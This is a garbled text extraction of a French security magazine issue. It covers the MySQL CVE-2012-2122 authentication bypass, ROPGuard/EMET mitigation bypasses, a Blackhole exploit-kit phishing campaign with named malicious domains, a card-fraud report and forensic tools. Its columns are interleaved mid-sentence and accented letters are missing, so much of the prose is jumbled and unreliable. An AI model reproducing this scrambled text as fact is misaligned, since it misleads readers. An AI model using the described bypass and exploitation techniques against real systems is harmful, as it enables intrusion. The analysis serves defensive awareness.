Le script suivant a t publi aprs la dcouverte de la vul- pas bon...
nrabilit. Ce dernier se compose uniquement dune boucle
effectuant une connexion la base de donnes. Sur un sys-
tme potentiellement vulnrable, celui-ci permet alors de Donc, sur la plupart des systmes, la fonction memcmp
sauthentifier simplement auprs du serveur MySQL, sans renvoie des valeurs comprises entre -255 et 255. Partant de
pour autant connaitre le mot de passe de lutilisateur... ce constat, le code de comparaison du mot de passe est le
suivant :

Aprs plusieurs tentatives, nous voici connects.

30
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
La fonction memcmp renvoie une variable de type integer, scramble , est effectue entre 2 valeurs, gnres partir
soit 4 octets. La fonction check_scramble elle, renvoie du mot de passe. Ces valeurs sont cres avec un seed ala-
une variable de type char, soit 1 octet. Lors de la conver- toire, recalcule chaque appel de la fonction. Il y a alors 1
sion du type integer en char, seul loctet de poids faible est chance sur 256 pour que la valeur de retour de la fonction
gard. Ainsi, toutes les valeurs retournes par la fonction check_scramble soit gale 0. La valeur de retour de
check_scramble seront toujours comprises entre -128 cette fonction tant utilise lors de la validation du mot de
et 127. Comme loctet de poids fort est perdu, il est alors passe, il y a alors 1 chance sur 256 que MySQL accepte le
possible de retrouver plusieurs fois la mme valeur, pour mot de passe.
diffrents retours de memcmp !

Par exemple, la valeur 256 est gale la valeur suivante en Et le patch ?


binaire : 00000001.00000000
Celui-ci est trs simple. Au lieu de convertir directement
Comme un char ne fait quun octet, le bit de poids fort dis- le rsultat de la fonction memcmp, la valeur de retour est
paraitra pendant la conversion, ce qui donnera en binaire : transmise dans une fonction renvoyant 0 si celle-ci est
00000000. La valeur retourne par check_scramble sera gale 0, ou 1 dans le cas contraire.
alors 0, validant ainsi le mot de passe.

La valeur de retour de la fonction check_scramble est


donc gale 0 toutes les 256 valeurs.

Le code suivant a t lanc sur un systme hbergeant un


MySQL non vulnrable, puis sur un systme avec un MySQL
vulnrable.

La valeur convertie en char ne posera alors plus de pro-


blme, elle vaudra toujours 1 ou 0.

Et limpact de cette faille ?

Malgr un buzz sur le sujet, peu de systmes sont impacts.


En effet, seuls les systmes ayant leur glibc optimise SSE
sont vulnrables. Les principaux systmes impacts sont les
suivants :
+ Ubuntu Linux 64-bit
+ OpenSuSE 64-bit
+ Debian Unstable 64-bit
+ Fedora
+ Arch Linux

On retrouve peu de systmes utiliss en entreprise. RedHat,


Debian, SuSE, ou encore FreeBSD ne sont pas vulnrables.

Daprs une tude mene par HD Moore, sur 1,74 million


de MySQL trouvs en coute sur internet, 44 000 seulement
reposeraient sur Ubuntu. Seule une partie de ces 44 000
MySQL serait vulnrable, puisquil ny a que la version 64
Sur un systme non vulnrable, nous avons constat que la
bits dUbuntu qui est concerne.
fonction memcmp renvoie des valeurs comprises entre
-255 et 255 uniquement. Sur un systme vulnrable, celle-
Rfrences
ci renvoie des valeurs comprises entre -65280 et 65280.

Cest une optimisation de la glibc, compile avec les jeux


dinstruction Streaming SIMD Extensions , gnralement + Rfrences CERT-XMCO
CXA-2012-0981, CXA-2012-0983, CXA-2012-0988
abrg SSE, qui modifie le comportement de la fonction
memcmp. Etant donn quun octet est perdu lors de la
conversion, la fonction check_scramble renvoie alors 0 +Exploit Metasploit
https://community.rapid7.com/community/metasploit/
toute les 256 valeurs !
blog/2012/06/11/cve-2012-2122-a-tragically-comedic-se-
curity-flaw-in-mysql]
La comparaison opre au sein de la fonction check_
31
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
F5 et ses clefs....
par Adrien GUINAULT

atache
Le 11 juin 2012, la liste de diffusion Full disclosure a
quelque peu rveill la communaut avec la publication des
dtails sur une vulnrabilit critique affectant les quipe-
ments F5 BIG-IP.
Retour et explication de cette vulnrabilit

BIG quoi ?

Les systmes F5 BIG-IP sont des appliances jouant le rle


la fois de reverse proxy et de load balancer. Ces derniers,
particulirement apprcis des RSSI peuvent tre adminis-
trs par le biais dune interface web mais galement en ligne
de commande au travers du protocole SSH, jusque l tout va
bien.

Vulnrabilit critique vous avez dit ?

La suite de cet article est rserve aux abonns du CERT-


XMCO...

32
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le white-paper du mois
par Charles DAGOUAT

The Shopping Sherpa


ments de proximit et sur les retraits, qui sont respective-
LObservatoire de la scurit des cartes de paiement ment passes de 0,012 % et 0,024 % en 2010, 0,015 %
publie son rapport annuel 2011 et 0,029 %.
On peut noter que ces deux facteurs daugmentation princi-
Tout comme les annes prcdentes, la Banque de France paux correspondent aux attaques les plus en vogue contre
a publi dbut juillet son 9e rapport annuel sur la scurit les cartes bancaires : vols dinformations bancaires via des
des cartes de paiement pour lanne 2011. malwares tels que les bankers, et skimming des cartes.
Ce rapport se compose de plusieurs parties distinctes abor- Dans le mme temps, malgr une avance importante en
dant les sujets suivants :
+ ltat des lieux de la scurisation des paiements par
carte sur Internet ;
matire defficacit des moyens de scurisation mis en
place par les prestataires de paiement, lObservatoire met

+ les statistiques de fraude pour 2011 ;


en avant que seulement 23 % des transactions ralises

+ une veille technologique ;


sur Internet sont protges contre le rejeu des informations

+ la coopration internationale en matire de lutte contre


la fraude ;
changes via des mcanismes de protection tels que 3D-
Secure. Ladoption de ces protections par les eCommercants

+ les conseils de prudence lusage des porteurs ;


est une priorit pour la Banque de France, qui annonce

+ la protection du titulaire dune carte en cas de paie-


ment non autoris ;
que des mesures seront prises dans ce sens pour faciliter
cette gnralisation, et que par ailleurs SecuRe Pay , le

+ la prsentation des missions et de lorganisation de


lObservatoire ;
forum europen sur la scurit des moyens de paiement
a propos des recommandations similaires qui pourraient

+ et enfin des dfinitions concernant la typologie de la


fraude relative aux cartes de paiement.
dboucher sur la gnralisation terme de ces dispositifs
au niveau europen.
En matire de scurit des paiements, lobservatoire nen-
visage pas pour linstant le dploiement massif de solu-
Contrairement la tendance baissire au niveau mondial tions de paiement par smartphone. En effet, ces terminaux
(voir CXA-2012-1329), le taux de fraude aux cartes ban- sont encore actuellement trop peu scuriss pour offrir les
caires en France stablit pour lanne 2011 0,077 % mmes protections quun terminal de paiement tradition-
(quivalent un montant total de 413,2 millions deuros), nel.
en lgre augmentation de 0,003 % par rapport lanne Enfin, mme si de nombreuses passerelles dchange
prcdente (0,074 % et 368,9 millions deuros en 2010, existent entre les acteurs de la lutte contre la fraude, ce rap-
voir CXA-2011-1153). port prsente les diffrents axes damlioration en matire
de coopration aussi bien en France, en Europe ou dans le
Cette diffrence entre la France et le reste du monde peut monde.
tre explique par plusieurs facteurs principaux :
+ limportante augmentation de la fraude sur les paie-
ments distance (par internet, par tlphone et par cour-
Lobservatoire propose aussi aux porteurs de cartes de
paiement des recommandations pour assurer la scurit de
leurs transactions dans un document disponible ladresse
rier) qui est passe de 0,262 % en 2010 0,321 %, avec suivante :
la fraude sur Internet en premire place 0,341 % (contre http://www.banque-france.fr/observatoire/telechar/An-
0,276 % en 2010). Ce type de fraude tant dautant plus nexe1.pdf
important quil reprsente plus de 60 % du montant total
de la fraude, alors que le paiement distance ne repr- Ce rapport est disponible ladresse suivante :
sente quenviron 8 % des transactions au niveau national.
+ limportante augmentation de la fraude sur les paie-
http://www.banque-france.fr/observatoire/rap_act_fr_11.
htm 33
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
R&D : ROPGuard et EMET

par Franois LEGUE

ROPGuard et contournements... prsente une certaine adresse au sein du processus en


mmoire (0x7FFE0000). Le contournement consiste ensuite
Microsoft, dans loptique damliorer la scurit de ses sys- appeler la fonction ZwProtectVirtualMemory qui per-
tmes dexploitation, a rcemment lanc un concours nom- met de modifier les proprits dune zone mmoire et de la
m BlueHatPrize. Le but de ce concours tait de concevoir rendre excutable. Cet appel systme permet lattaquant
une technique de mitigation dexploitation supplmentaire de rendre excutable la zone mmoire o est place sa
celles dj existantes (DEP, SAFESEH, ASLR). Les gains charge utile pour ensuite y dvier le flux dexcution du
slevaient 200 000 $ pour le premier prix, de 50 000 $ programme.
pour le deuxime prix et une souscription lensemble du Lastuce rside ici dans lutilisation du Syscall ZwProtec-
MSDN (10 000$) pour le troisime prix. tVirtualMemory permettant de raliser la mme opra-
Microsoft annona les trois finalistes de ce concours, Vasilis tion que VirtualProtect et qui nest pas contrle par EMET.
Pappas, Ivan Fratric et Jared DeMott, peu de temps avant Lexploit de Ponez modifie ensuite EMET en mmoire afin
les rsultats finaux lors de la BlackHat 2012. de pouvoir appeler dautres APIs normalement contrles.

Ivan Fratric a vu sa protection, ROPGuard tre implmente Le but du concours tait de concevoir une
au sein dEMET. Ce logiciel vise ajouter des couches sup- technique de mitigation dexploitation sup-
plmentaires de mitigations celles offertes de base par le plmentaire celles dj existantes (DEP,
systme dexploitation.
SAFESEH, ASLR).
La protection ROPGuard vise empcher lexploitation de
vulnrabilits se basant sur la technique ROP qui permet de
contourner notamment la mitigation DEP et dans certains Le lendemain, Ponez met jour son article et spcifie que
cas de figure, la mitigation ASLR. Cette technique dexploita- Microsoft tait dj au courant de ce type de contourne-
tion repose sur la rutilisation de portions de code (appels ment. Il publie, le jour mme, une nouvelle technique de
gadgets) du logiciel vulnrable afin dexcuter des instruc- contournement. Celle-ci se base cette fois sur la DLL Ker-
tions contrles par lattaquant (charge utile de lexploit). nelBase.dll (prsente sur les systmes Windows 7) qui
Cest la technique la plus utilise dans les exploits actuels. nest pas du tout contrle par EMET (contrairement aux
ROPGuard contrle lors de lexcution et particulirement fameuses DLL ntdll.dll et kernel32.dll). Grce une charge
les appels aux fonctions sensibles souvent appeles par les utile spcifique, la nouvelle technique de contournement
charges utiles des exploits (VirtualProtec, VirtualAlloc, ). consiste obtenir ladresse de la fonction VirtualProtect
partir de cette DLL et de parvenir au mme rsultat.
Bien que cette protection semble tre efficace, un chercheur Il est cependant noter que ces techniques de contourne-
iranien connu sous le pseudonyme de Ponez publia aprs ment de ROPGuard reposent sur la connaissance dadresses
la parution dEMET 3.5 une technique de contournement de de structures ou de DLL. Ainsi, si la mitigation ASLR est acti-
cette nouvelle mitigation. ve sur le logiciel vulnrable, lattaquant doit au pralable
Celle-ci se base sur le fait que la protection ROPGuard ne contourner cette mitigation (modules ne participant pas
contrle quun certain nombre dAPIs sensibles (Virtual- lASLR, fuite dadresse mmoire).
Protect, VirtualAlloc,.). Ponez a trouv une technique
permettant didentifier la fonction KiFastSystemCall http://repret.wordpress.com/2012/08/08/bypassing-
partir de la structure SHARED_USER_DATA qui est toujours emet-3-5s-rop-mitigations/
34
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le Phishing du mois : AT&T
vs Blackhole

par Adrien GUINAULT

kennytyy
Rodrigo R.
AT&T and BlackHole Une fois le lien suivi, linternaute est dirig vers de nom-
breux domaines diffrents. Dans notre cas, nous avons reu
Ce mois-ci intressons-nous une nouvelle attaque de deux emails diffrents poitant vers :
phishing affectant cette fois la socit AT&T. + http://jaguarloszer.info

Nous avons reu un email assez profesionnel nous deman-


+ http://vogantube.com

dant de sauthentifier sur le site de AT&T afin de rgler une


facture...

Ces deux sites embarquent une iframe qui redirige linter-


naute vers une page obfusque.

Une fois le contenu de la variable g dchiffr, nous obte-


nons plus de 2000 lignes de codes JavaScript dont quelques
lments nous donnent des indications prcises sur la na-
ture des actions ralises.

35
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le Phishing du mois

Le dchiffrement de cette variable avec un XOR (0x28) per-


met de distinguer une URL de la forme w.php?f=XXXXX.

Ce type dURL est caractristique des serveurs de


Command&Control bass sur BlackHole.

Nous pouvons dduire que le ShellCode en question tait


donc destin exploiter une vulnrabilit dans lun des
logiciels tiers indiqus puis connecter la machine com-
promise au serveur C&C contrl par les pirates (Download
Exec).

Conclusion

Cette attaque qui paraissait tre un simple Phishing est en


ralit bien plus critique puisquelle a sans doute permis
aux pirates de prendre le contrle de nombreux PC dinter-
nautes crdules ou curieux de suivre le lien...

En effet, le code tente didentifier la version de Flash,


Adobe et de Java puis fait appel une fonction nomme
getShellCode ...

36
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
chaque parution, dans cette rubrique, nous
Blog, logiciels et Twitter
vous prsentons des outils libres, des extensions
Firefox, ou encore nos sites web prfrs.

Pour cette dition, nous avons choisi de vous pr-


senter WOLFY et Microsoft Security Compliance
Manager ainsi quune slection des profils Twit-
ter suivis par le CERT-XMCO.

Maximilian

BLOGS WOLFY
Outil Post-Forensics

LOGICIELS
TWITTER
Microsoft Security Compliance Manager
Analyse et dploiement de GPO

Top Twitter
Une slection de comptes Twitter suivis par le CERT-XMCO

37
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Blog, logiciels et Twitter

> WOLFY + Recherche sur les connexions rseau (ex: le serveur


Web en DMZ a une connexion sur le port NETBIOS dun
serveur de fichiers interne, une machine a tabli une
Outil post-forensics connexion avec un serveur C&C identifi lors des investi-
gations, etc.);
DISPONIBLE A LADRESSE SUIVANTE :
http://www.xmco.fr/wolfy-post-forensics.html
+ Tester les connexions TCP directes (ex: est-ce que la
machine a un accs direct Internet, est-ce que le serveur
en DMZ peut faire des connexions sur le LAN, ...);
+ Recherche au sein des logs locaux Windows (ex:
connexion avec un compte dadministration utilis par les
pirates, dtection deventID suspect...);
Avis XMCO + Recherche sur certains Artifacts Windows (/Recent de
chaque compte local, les tches planifies, Startup Com-
mand);
Wolfy est un excellent outil :-) dvelopp dans le cadre
de missions forensics afin de rechercher des pattern
+ Recherche sur tous les programmes en cours dex-
cution et le PATH de chaque DLL charge (ex: identifier
prcis (clefs de registre, fichiers, etc.) sur des systmes une DLL injecte au sein dun programme/service depuis
Windows. le dossier TEMP, le HOME dun utilisateur ou un autre
disque...);
Description + Les rsultats sont par ailleurs exportables en TXT/HTML
et parsables avec GREP (ex: grep FOUND).
XMCO Wolfy permet de rechercher la prsence dune
Quelques autres exemples concrets/simples dutilisation :
backdoor ou toute autre signature personnalise dune
intrusion sur de nombreuses machines Windows et ceci + Identifier des machines compromises par une
backdoor/malware pendant que lditeur antivirus dve-
distance (RPC/WMI):
+ Recherche sur la prsence de fichiers (ex: la prsence
dune DLL identifie dun malware situe dans le dossier
loppe un quick patch pour celle-ci;
+ Identifier des machines encore infectes par un ver
connu (ex: Mariposa) que lantivirus ne dtectait pas;
des utilisateurs);
+ Recherche sur la prsence de cl de registre (ex: + Rechercher la prsence de Flame partir de len-
semble des informations publiques;
conformit avec la PSSI, prsence de cl lie linstalla-
tion dune backdoor); + Identifier des comptes dadministration compromis
(utilisation de pwdumpLike au sein des Artifacts Windows
/Recent).

38
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Blog, logiciels et Twitter

> Microsoft Security Description

Compliance Manager SCM est un logiciel de scurit gratuit et fourni par Micro-
soft qui permet :
Analyse GPO + daccder de manire simple lensemble des docu-
mentations scurit fournies par Microsoft;
DISPONIBLE A LADRESSE SUIVANTE : + dimporter ses propres GPO et de les comparer/fusion-
ner avec les Meilleures Pratiques de Microsoft;
+
http://technet.microsoft.com/en-us/library/cc677002.aspx
dobtenir des descriptions dtailles pour chacun des
paramtres de scurit;

Avis XMCO
+ dexporter vos nouvelles GPO sous diffrents formats.

SCM ncessite Windows Installer, le framework .NET et SQL


Cet outil peu mdiatis est un must have pour tous les Express
administrateurs qui souhaitent comparer leur GPO aux
Meilleures Pratiques de Microsoft.

Cet outil est simple utiliser et permet notamment dex-


porter les GPO adaptes afin de les utiliser sur un Systme
dInformation. Entres les documentations techniques et
les nombreuses fonctions offertes, il devrait rapidement
tre adopt.

39
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

we deliver security expertise

> Slection des comptes Twitter suivis


par le CERT-XMCO

CERT-XMCO Advisories http://twitter.com/CERTXMCO_veille

Shahriyar Jalayeri http://twitter.com/ponez

Eloi Vanderbeken http://twitter.com/elvanderb

Andr Moulu http://twitter.com/andremoulu

@Myst3rie http://twitter.com/Myst3rie

Nicolas Ruff http://twitter.com/newsoft

@msftsecresponse http://twitter.com/msftsecresponse

@jgrusko http://twitter.com/jgrusko

@adobesecurity http://twitter.com/AdobeSecurity

Securing the Human (SANS) http://twitter.com/SecureTheHuman

40
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Romain MAHIEU
> Remerciements
Articles
Ruben Bos
http://www.flickr.com/photos/rbos/3777920783/sizes/l/in/photostream/

Paperghost
http://www.flickr.com/photos/paperghost/2792847567/sizes/o/in/photostream/

andylangager
http://www.flickr.com/photos/andylangager/4711979863/sizes/o/in/photostream/

B_Zedan
http://www.flickr.com/photos/bzedan/2905906576/sizes/o/in/photostream/

Cdric Blancher
http://sid.rstack.org/gallery/?galerie=201204_Paris
http://sid.rstack.org/gallery/?galerie=201206_Rennes

tashland
http://www.flickr.com/photos/tashland/389926564/sizes/o/in/photostream/

PixelManiatiK
http://www.flickr.com/photos/pixelmaniatik/2133750549/sizes/m/in/photostream/

Nina
http://www.flickr.com/photos/sedagenvakna/5127877151/lightbox/

iMaffo
http://www.flickr.com/photos/imaffo/1567358032/sizes/o/in/photostream/

AllanReyes
http://www.flickr.com/photos/pixeleden/229917021/sizes/o/in/photostream/

Scott McLeod
http://www.flickr.com/photos/mcleod/4912039393/sizes/o/in/photostream/

Volantra
http://www.flickr.com/photos/volantra/3406410663/sizes/o/in/photostream/

rosefirerising
http://www.flickr.com/photos/rosefirerising/6848231383/sizes/o/in/photostream/

atache
http://www.flickr.com/photos/atache/4894993972/sizes/l/in/photostream/

The Shopping Sherpa


http://www.flickr.com/photos/49333775@N00/5489910500/sizes/o/in/photostream/

Rodrigo R.
http://www.flickr.com/photos/decipher_/4183141862/sizes/l/in/photostream/

LActuScu est un magazine numrique rdig et dit par les consultants du cabinet
de conseil XMCO. Sa vocation est de fournir des prsentations claires et dtailles sur le
thme de la scurit informatique, et ce, en toute indpendance. Tous les numros de
lActuScu sont tlchargeables ladresse suivante (versions franaises et anglaises) :
http://www.xmco.fr/actusecu.html
41
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
69 bis, rue de Richelieu
75002 Paris - France

tl. +33 (0)1 47 34 68 61


fax. +33 (0)1 43 06 29 55
mail. info@xmco.fr
web www.xmco.fr

SAS (Socits par Actions Simplifies) au capital de 38 120 - Enregistre au Registre du Commerce de Paris RCS 430 137 711
Code NAF 6202A - NSIRET : 430 137 711 00049 - N TVA intracommunautaire : FR 29 430 137 711
www.xmco.fr